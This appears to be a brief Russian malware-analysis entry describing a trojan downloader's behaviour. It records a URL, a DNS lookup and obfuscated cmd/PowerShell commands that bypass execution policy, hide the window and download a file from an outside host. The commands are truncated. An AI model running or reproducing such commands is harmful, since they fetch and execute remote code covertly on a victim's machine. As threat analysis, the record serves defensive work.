Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^O^weRSHE^Ll^.^EXe ^-eXEc^uTI^Onp^olIC^y ^bypA^s^S -^nopR^O^f^i^LE -^WIndoWsTyle^ h^iDD^E^n^ (^NE^w^-Obj^eC^t SY^StE^m.^nE^t.we^Bc^Lie^N^t).^D^OwnLO^ADFIlE(^'http://toagoo...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "P^O^weRSHE^Ll^.^EXe ^-eXEc^uTI^Onp^olIC^y ^bypA^s^S -^nopR^O^f^i^LE -^WIndoWsTyle^ h^iDD^E^n^ (^NE^w^-Obj^eC^t SY^StE^m.^nE^t.we^Bc^Lie^N^t).^D^OwnLO^ADFIlE(^'http://toagoo...' (со скрытым окном)